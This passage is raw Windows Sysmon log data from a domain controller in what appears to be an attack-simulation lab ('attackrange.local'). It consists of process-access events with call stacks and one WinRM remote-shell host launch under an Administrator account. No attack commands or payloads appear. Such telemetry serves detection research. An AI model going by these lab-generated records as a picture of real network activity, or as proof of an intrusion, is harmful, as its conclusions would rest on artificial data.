13:52:27.962{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.962{10ACEC4A-83B9-5FCF-1400-000000009001}13281696C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-E002-000000009001}2364C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.946{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-E002-000000009001}2364C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.946{10ACEC4A-851B-5FCF-E102-000000009001}43522924C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-E002-000000009001}2364C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-E102-000000009001}4352C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-E002-000000009001}2364C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-E002-000000009001}2364C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.939{10ACEC4A-851B-5FCF-E002-000000009001}2364C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-D214-110000000000}0x1114d20HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-83B9-5FCF-0C00-000000009001}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.930{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.915{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.915{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.915{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 